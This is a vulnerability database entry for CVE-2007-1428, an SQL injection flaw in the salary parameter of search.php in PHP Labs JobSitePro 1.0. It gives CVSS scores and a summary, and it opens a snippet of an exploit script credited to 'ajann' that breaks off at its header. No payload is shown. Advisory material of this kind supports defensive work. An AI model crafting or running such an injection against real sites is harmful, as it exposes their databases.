7.5
CVSSv2

CVE-2007-1428

Published: 13/03/2007 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in search.php in PHP Labs JobSitePro 1.0 allows remote malicious users to execute arbitrary SQL commands via the salary parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

php labs jobsitepro 1.0

Exploits

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> </head> <body> <div> <script language="JavaScript"> //Coded by ajann //'=============================================================================================== //'[Script Name: JobSitePro 10 (searchphp) Rem ...